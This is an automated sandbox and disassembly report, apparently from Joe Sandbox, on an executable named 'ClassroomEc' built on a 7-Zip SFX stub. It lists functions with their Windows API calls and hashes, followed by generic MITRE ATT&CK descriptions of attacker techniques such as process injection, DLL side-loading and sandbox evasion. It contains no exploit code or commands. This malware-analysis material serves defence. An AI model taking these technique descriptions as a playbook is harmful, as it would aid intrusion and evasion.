API String ID: 3936482309-0
Opcode ID: c46c3d21da292d5c287f262b2d8b2787b558d5b8c417251ead2f5585576ed1b7
Instruction ID: 2bd62cf56b9d2322456a7da70dc9b9418f9941f6982406b5c6146f236e92e9c1
Opcode Fuzzy Hash: c46c3d21da292d5c287f262b2d8b2787b558d5b8c417251ead2f5585576ed1b7
Instruction Fuzzy Hash: F9218574A10108EFDB08DF88C6A4B9EB7F1AF44308F248198D8052B342CB75AF45EBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00A97E9D Relevance: 7.5, APIs: 5, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97ED4
GetCurrentProcessId.KERNEL32 ref: 00A97EE0
GetCurrentThreadId.KERNEL32 ref: 00A97EE8
GetTickCount.KERNEL32 ref: 00A97EF0
QueryPerformanceCounter.KERNEL32(?), ref: 00A97EFC

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 12733eaff2afae051c5160abd4ac157e254a4b03d6484bc7a2d83fa207b20220
Instruction ID: 19a4c3b9f058b1c8038f775684f92ebe03e708a7054a4980e6f337769f2413d1
Opcode Fuzzy Hash: 12733eaff2afae051c5160abd4ac157e254a4b03d6484bc7a2d83fa207b20220
Instruction Fuzzy Hash: 84015E76E10214ABCF10DBF8DC8869EB7F8FB48355F56456AE901E7210EF305D428B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B720 Relevance: 7.5, APIs: 5, Instructions: 22COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMTD ref: 00A7B72A
std::exception::exception.LIBCMTD ref: 00A7B735
std::exception::exception.LIBCMTD ref: 00A7B740
std::exception::exception.LIBCMTD ref: 00A7B74B
std::exception::exception.LIBCMTD ref: 00A7B756

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: f8b1769de61019bb7566d5c90b2c811e35ceb3ea17b41fd2fe326901ab575d52
Instruction ID: b203be8940bf3dcd9abc4f6c6cf14e2ef10b8d463b84cf599ff1727ca01890a4
Opcode Fuzzy Hash: f8b1769de61019bb7566d5c90b2c811e35ceb3ea17b41fd2fe326901ab575d52
Instruction Fuzzy Hash: 13E00A30D05108EBCB08FBD8DE62A6DB3759F84344B1485DDE41A77342CA356F10EA96

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AB90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A79240: GetSystemMetrics.USER32(0000000B), ref: 00A79289
Part of subcall function 00A79240: GetSystemMetrics.USER32(0000000C), ref: 00A7929B

GetSystemMetrics.USER32(00000007), ref: 00A7ABA3
GetSystemMetrics.USER32(00000007), ref: 00A7ABBB
_DebugHeapAllocator.LIBCPMTD ref: 00A7ABD9

Strings

100%% , xrefs: 00A7ABE9, 00A7AC68

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: MetricsSystem$AllocatorDebugHeap
String ID: 100%%
API String ID: 1530364085-568723177
Opcode ID: 9776849e6deb98928621de889c6af7bc5ab8722ab604c7cfaca5529f2d93ed9f
Instruction ID: fd83fde7d30c4721a2471ea9dee5dcf6e7bc2ebdae9c176a5eeba9cb277cede9
Opcode Fuzzy Hash: 9776849e6deb98928621de889c6af7bc5ab8722ab604c7cfaca5529f2d93ed9f
Instruction Fuzzy Hash: 3051CC35A002099FCB08DF98C991DEEBBB5BB98324F249159D505BB355DB30ED82CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A79130 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,000001F4,00000000), ref: 00A79163
GetSystemMetrics.USER32(00000031), ref: 00A7919A
CreateFontIndirectW.GDI32(?), ref: 00A791B3
DeleteObject.GDI32(00000000), ref: 00A79213

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 576d49fabd5fa28a70a6c87493bbf6a84356e89cc6f611f2d35c55c8e06a7b6f
Instruction ID: 3d4b259a0187767afa749c20813eae9845359adb432f4e73217759b29d549be6
Opcode Fuzzy Hash: 576d49fabd5fa28a70a6c87493bbf6a84356e89cc6f611f2d35c55c8e06a7b6f
Instruction Fuzzy Hash: CF31D8B4A8021E9FDB64DF54CC88BDAB7B4BB58304F1082D9A819A7351DB709EC5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A280 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00A797C0: GetDlgItem.USER32(00000000,?), ref: 00A797D8

Part of subcall function 00A79890: ShowWindow.USER32(00000000,?,000004B2), ref: 00A798CA

memset.MSVCRT ref: 00A7A2FA
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00A7A30E
SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 00A7A32E

Part of subcall function 00A78A60: GetDlgItem.USER32(?,00000000), ref: 00A78A72

SetWindowLongW.USER32(00000000,000004B7,000000FC), ref: 00A7A35B

Part of subcall function 00A793F0: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00A79410
Part of subcall function 00A793F0: LoadIconW.USER32(00000000), ref: 00A79417
Part of subcall function 00A793F0: GetSystemMetrics.USER32(00000032), ref: 00A79424
Part of subcall function 00A793F0: GetSystemMetrics.USER32(00000031), ref: 00A7942D
Part of subcall function 00A793F0: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00A7943A
Part of subcall function 00A793F0: LoadImageW.USER32(00000000), ref: 00A79441
Part of subcall function 00A793F0: GetWindowLongW.USER32(00000000,000004B2), ref: 00A7949A
Part of subcall function 00A793F0: SetWindowLongW.USER32(00000000,000004B2,000000F0), ref: 00A794B6
Part of subcall function 00A793F0: GetWindowLongW.USER32(00000000,000004B5), ref: 00A794CC
Part of subcall function 00A793F0: SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00A794E8

Part of subcall function 00A7A5F0: SetFocus.USER32(00000000,000004B6,?,?,00A7A386), ref: 00A7A605

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: Window$Long$System$HandleItemLoadMetricsModule$DirectoryFileFocusIconImageInfoShowmemset
String ID:
API String ID: 1941954457-0
Opcode ID: 3d093818b7cf1bfd519ea2c8dd1e729d725b03b4ef4a4a0edf6aa71e085ae89a
Instruction ID: 5911bfcf4218d5dfeafbda5429d4b336bc985189d6ad537fedd17be185ecbe74
Opcode Fuzzy Hash: 3d093818b7cf1bfd519ea2c8dd1e729d725b03b4ef4a4a0edf6aa71e085ae89a
Instruction Fuzzy Hash: FA2101B0A40258ABDB24EB54CD95FEE7736BB44704F0041DAA7196B2C1DBB45EC4CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00A8F230 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8F23A
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8F245
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8F250
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8F25B

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 3936482309-0
Opcode ID: 735b02de2554931013301a33edab3d25c05a64bea15068d1d6116fd5ba41dda9
Instruction ID: d7f20ddbce1fedf40e7d94b63925f952bc7e34dd4b93826e777b56a0c2dd434e
Opcode Fuzzy Hash: 735b02de2554931013301a33edab3d25c05a64bea15068d1d6116fd5ba41dda9
Instruction Fuzzy Hash: 1C315274A04108EFDB04DF98C6A4B9EB7F1AF45308F244198D4092B342C7759F45EBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00A88EB0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(013329AD,00A9B2CC), ref: 00A88EDD
??2@YAPAXI@Z.MSVCRT ref: 00A88EF9
_wmemmove.LIBCMTD ref: 00A88F1E
??3@YAXPAX@Z.MSVCRT ref: 00A88F32

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ??2@??3@ExceptionThrow_wmemmove
String ID:
API String ID: 2584154162-0
Opcode ID: 270201c847157be863862f8f00697ea3d9dd6357a79309c56cacb6aa89dc1a71
Instruction ID: 458ed7a183d413837fbbf9e726b95dc0bc8c8600b84f80f5ae1820066e2b9981
Opcode Fuzzy Hash: 270201c847157be863862f8f00697ea3d9dd6357a79309c56cacb6aa89dc1a71
Instruction Fuzzy Hash: 8D11E9B5A00109AFCB04EF98D6819AEB7F5FF88300F208569E809A7345D731EE40CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A88A30 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(013329AC,00A9B2CC), ref: 00A88A5D
??2@YAPAXI@Z.MSVCRT ref: 00A88A69
memcpy.MSVCRT ref: 00A88A8E
??3@YAXPAX@Z.MSVCRT ref: 00A88AA2

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: 9fffac05fe227cdeab9907fd9d958c6743bf3e0dee8ec52e37ccd95f84ba2fc5
Instruction ID: 3ca2938b7135e3aeed07cab347f0ddcd667383c9e0232238944058a37e1e46a4
Opcode Fuzzy Hash: 9fffac05fe227cdeab9907fd9d958c6743bf3e0dee8ec52e37ccd95f84ba2fc5
Instruction Fuzzy Hash: 4D11C8B5E10209AFCF04DF98D5819AEB7F5FF48300F218199E809A7351D731AE50CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A86BD0 Relevance: 6.0, APIs: 4, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A86BDA

Part of subcall function 00A871D0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A871DA

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A86BE5
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A86BF0
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A86BFB

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 3936482309-0
Opcode ID: 2c4501c96bd74accec890b11d17ea2065319cbeb277c11bf43d1de14d19e341c
Instruction ID: de912a34d09806b2359465518091b3319318d7e52b67df2195d5a308322b5d47
Opcode Fuzzy Hash: 2c4501c96bd74accec890b11d17ea2065319cbeb277c11bf43d1de14d19e341c
Instruction Fuzzy Hash: 26019974A04108EBCB08EF98C6A5A5EB7F1EF44304F24419CD8052B342CB71AF41DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00A75C90 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A75C98
GetWindowRect.USER32(?,?), ref: 00A75CB3
ScreenToClient.USER32(00000000,?), ref: 00A75CC1
ScreenToClient.USER32(00000000,?), ref: 00A75CD2

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: fc02df5e872843cc896ed6b4682cd54bc590ce7ab5fc2c6befd04ab89e0748e7
Instruction ID: 0855126a4ca80a22b4310f9997ad8673c29cee1484459a989f10c2dfdfde05dc
Opcode Fuzzy Hash: fc02df5e872843cc896ed6b4682cd54bc590ce7ab5fc2c6befd04ab89e0748e7
Instruction Fuzzy Hash: 49F0D479A01208FBCB04DFE8DC48A9A77B8EB88312F10C54AFD09C7200DA35EA419B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A78990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A789AF
wsprintfW.USER32 ref: 00A789E1

Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E

Strings

(%d%s), xrefs: 00A789D5

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap_wmemmovewsprintf
String ID: (%d%s)
API String ID: 2575367435-2087557067
Opcode ID: 720154ec8970cd11925800eb819f4d84bb2e296d277118c8820691efc0d86908
Instruction ID: c0f88d645ae12d931e507d4c0599b22cb3ffcac98791c3819ee1a9267959d226
Opcode Fuzzy Hash: 720154ec8970cd11925800eb819f4d84bb2e296d277118c8820691efc0d86908
Instruction Fuzzy Hash: F90152B195021C9BDB24EB58DCC9BEA7378BB24304F5086D8A51DA3183EB706E94CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A77510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00A77521

Strings

7-Zip SFX, xrefs: 00A77515
Could not allocate memory, xrefs: 00A7751A

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: 6459df2cf9b7c68bb4c1e1ce2993fccd3de3cc94b062f8b02233f96d5119d217
Instruction ID: 8ba9cfd59fa90fb02d04fb13fc4e9bb62294d9e5cc26d5739a4ffffab4d52e3d
Opcode Fuzzy Hash: 6459df2cf9b7c68bb4c1e1ce2993fccd3de3cc94b062f8b02233f96d5119d217
Instruction Fuzzy Hash: 89B092343E83097BE940A2F56C0BF033AC8B728F56F400912F208AC4D2D8C2A0505096

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
